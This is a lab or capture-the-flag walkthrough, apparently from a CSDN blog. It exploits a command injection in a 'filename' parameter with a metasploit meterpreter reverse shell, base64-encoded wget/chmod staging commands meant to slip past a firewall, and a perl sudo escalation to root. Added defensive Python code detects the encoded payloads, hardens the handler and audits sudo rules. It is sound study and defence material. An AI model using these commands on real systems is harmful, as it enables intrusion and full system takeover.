Command injection vulnerability (2)

  1. Besides the EXP file used earlier, the vulnerability can also be exploited with the well-known metasploit framework.
  • The markers in the module search output show that each of these vulnerabilities has a metasploit module available.
  2. Open msfconsole, set the payload and the listening address, and launch the exploit so the handler is waiting for the connection:

```
msfconsole
set payload linux/x86/meterpreter_reverse_tcp
set lhost 192.168.101.45
exploit
```

  3. Generate a static payload (an ELF binary) for the reverse shell and place it in the web root:

```bash
msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.101.45 lport=4444 -f elf > /var/www/html/shell
```

  4. The target has to download the shell payload from the attacking machine before it can hand over the corresponding privileges, so the apache2 service must be running:

```bash
service apache2 start
service apache2 status
```

  5. In real engagements some operations are often blocked by a firewall, so the commands are base64-encoded here to get them past the filter.
  • Note: why use -O to write the file to /tmp? Because any user can write to the /tmp directory. (本机ip stands for the attacking machine's IP, 192.168.101.45 above.)

```bash
echo 'wget http://本机ip/shell -O /tmp/shell' | base64
```

  • Then change the file's permissions, granting the most permissive mode so it can be executed:

```bash
echo 'chmod 777 /tmp/shell' | base64
```

  • Then execute the shell file:

```bash
echo '/tmp/shell' | base64
```
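Base64 is an encoding, not encryption: anything that decodes parameter values before inspecting them sees the staged commands above in the clear. The following Python detector is an added example, not part of the original post. It scans the parameters of a query string, decodes any base64-looking runs, and flags values that contain the shell fragments this walkthrough relies on (wget, chmod, /tmp/, ...). The parameter name `filename` and the IP come from the post; the sample requests are constructed here, not captured traffic.

```python
import base64
import re
from urllib.parse import parse_qs, quote

# Shell fragments that indicate a payload is being staged. The list mirrors the
# commands used in this walkthrough (fetch to /tmp, chmod, execute via a shell).
SUSPICIOUS_TOKENS = (
    "wget ", "curl ", "chmod ", "/tmp/", "/bin/bash", "/bin/sh",
    "| sh", "|sh", "| bash", "|bash", "base64 -d",
)

# A run of 16 or more base64-alphabet characters with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_runs(value):
    """Return the plaintext of every base64-looking run in value that decodes to readable text."""
    decoded = []
    for match in B64_RUN.finditer(value):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore this run
        if text.replace("\n", "").replace("\t", "").isprintable():
            decoded.append(text)
    return decoded


def analyze_query(raw_query):
    """Inspect every parameter value, both raw and base64-decoded, for shell tokens.

    Returns a list of findings: {"param", "kind", "decoded", "tokens"}.
    """
    findings = []
    for name, values in parse_qs(raw_query, keep_blank_values=True).items():
        for value in values:
            candidates = [("raw", value)]
            candidates += [("base64", text) for text in decode_b64_runs(value)]
            for kind, text in candidates:
                hits = [tok for tok in SUSPICIOUS_TOKENS if tok in text]
                if hits:
                    findings.append(
                        {"param": name, "kind": kind, "decoded": text.strip(), "tokens": hits}
                    )
    return findings


# Constructed sample requests (not captured traffic). STAGED_CMD is exactly what
# `echo '...' | base64` encodes in the walkthrough, trailing newline included.
STAGED_CMD = "wget http://192.168.101.45/shell -O /tmp/shell\n"
ENCODED_QUERY = "filename=" + quote(base64.b64encode(STAGED_CMD.encode()).decode())
RAW_INJECTION_QUERY = "filename=" + quote("a.csv; chmod 777 /tmp/shell")
BENIGN_QUERY = "filename=report.csv"

if __name__ == "__main__":
    for label, query in (("encoded", ENCODED_QUERY), ("raw", RAW_INJECTION_QUERY), ("benign", BENIGN_QUERY)):
        print(label, analyze_query(query))
```

The decoded text is checked with the same token list as the raw value, so the encoding step buys the attacker nothing against a filter built this way; the 302 redirects mentioned later are another signal worth correlating with such hits in the web server logs.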

  6. Use Burp Suite to capture the request, replace the value of the filename parameter with the encoded command, and click Send.
  • If the value of filename is changed twice in the same window, the server redirects the request, so the packet has to be re-captured and filename modified each time. To avoid mistakes, I created three new .csv files.
  • The shell connects back successfully.
    Note: I also tried many times before it succeeded. If one attempt fails, try again; sometimes it is human error, sometimes a server problem. A 302 response means the attempt failed.
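The injection point in this walkthrough is a filename parameter that the server evidently passes to a shell. The Python snippet below is an added example, not the target application's code (which the post does not show): it contrasts a handler that splices the parameter into a shell command string with one that validates the name against a strict pattern and runs the tool without any shell. The upload directory and the `wc -l` row count are assumptions made for the example.

```python
import re
import subprocess
from pathlib import Path

UPLOAD_DIR = Path("/var/www/uploads")  # assumed location of uploaded .csv files
# A bare file name: alphanumerics, dot, dash, underscore, ending in .csv; no '/', ';', '|', '$', spaces.
SAFE_CSV_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\.csv")


def build_shell_command_vulnerable(filename):
    """BAD: the parameter lands inside a shell command string.

    A value such as "a.csv; <command>" ends the intended command and runs the
    attacker's one as the web server user; this is the pattern exploited via Burp
    in the walkthrough. Returned as a string for inspection, never executed here.
    """
    return f"wc -l {UPLOAD_DIR}/{filename}"


def validate_csv_name(filename):
    """Accept only a bare .csv file name; reject path separators, metacharacters and traversal."""
    if not SAFE_CSV_NAME.fullmatch(filename) or ".." in filename:
        raise ValueError(f"rejected file name: {filename!r}")
    return filename


def is_accepted(filename):
    """Boolean convenience wrapper around validate_csv_name."""
    try:
        validate_csv_name(filename)
    except ValueError:
        return False
    return True


def build_argv_hardened(filename):
    """Validate, resolve the path inside UPLOAD_DIR, and return an argv list (no shell involved)."""
    path = (UPLOAD_DIR / validate_csv_name(filename)).resolve()
    if path.parent != UPLOAD_DIR.resolve():
        raise ValueError("path escapes the upload directory")
    return ["wc", "-l", str(path)]


def count_rows(filename):
    """Run the hardened argv: each list element is one argument, so metacharacters are inert."""
    result = subprocess.run(build_argv_hardened(filename), capture_output=True, text=True, check=True)
    return int(result.stdout.split()[0])


if __name__ == "__main__":
    print(build_shell_command_vulnerable("a.csv; id"))   # injected text survives into the shell string
    print(is_accepted("a.csv; id"), is_accepted("report.csv"))
    print(build_argv_hardened("report.csv"))
```

Two layers matter here: the allowlist pattern rejects anything that is not a plain file name, and the argv form means that even if validation were loosened later, the parameter would still be a single argument to wc rather than shell syntax.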
  7. Once in, run the shell command and check the current user: it is the www-data account.
  • Use sudo -l to list which commands the current user may run as the superuser.
  • It turns out that perl may be executed with sudo via the perl command.
  • Carry out the escalation:

```bash
perl -e "exec '/bin/bash' "
bash -i
```

  • Privileges are successfully elevated; enter /root and view the contents of flag.txt.
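The escalation works because sudo -l shows that www-data may run perl as root, and an interpreter running as root is a root shell. The Python audit below is an added example, not from the post: it parses the command section of sudo -l style output and flags rules that grant an interpreter or shell, or ALL. The sample output is constructed to mirror the situation described above; the host name and the second rule are invented.

```python
import re
import shlex

# Interpreters and shells: a sudo rule granting one of these as root is effectively a root shell.
SHELL_CAPABLE = {"perl", "python", "python2", "python3", "ruby", "sh", "bash", "dash", "zsh", "env"}

# Matches rule lines such as "    (root) NOPASSWD: /usr/bin/perl"
RULE_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(output):
    """Return (runas, tags, command) for each rule after the 'may run the following commands' line."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_LINE.match(line)
        if m:
            tags = tuple(t.rstrip(":") for t in m.group("tags").split() if t)
            rules.append((m.group("runas").strip(), tags, m.group("cmd")))
    return rules


def audit_sudo_rules(output):
    """Return the rules that hand out an interpreter/shell or ALL, each with a reason."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        if cmd == "ALL":
            findings.append({"runas": runas, "tags": tags, "cmd": cmd, "reason": "unrestricted ALL"})
            continue
        binary = shlex.split(cmd)[0].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE:
            findings.append({"runas": runas, "tags": tags, "cmd": cmd,
                             "reason": f"{binary} is an interpreter or shell"})
    return findings


# Constructed sample in the shape of `sudo -l` output for www-data.
# The host name and the systemctl rule are invented; the perl rule mirrors the walkthrough.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on target-host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on target-host:
    (root) NOPASSWD: /usr/bin/perl
    (root) NOPASSWD: /usr/bin/systemctl status apache2
"""

if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```

Run against the real output of `sudo -l` (or the sudoers files themselves) during a hardening review, the same check surfaces the misconfiguration before an attacker does; the fix is to grant a narrowly scoped wrapper script rather than the interpreter itself.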

Summary: metasploit does make exploitation more efficient, but the crux is getting past the firewall. In real engagements some operations are often filtered by the firewall, so base64-encoding the commands is a very common bypass technique.

Origin blog.csdn.net/weixin_45007073/article/details/112602950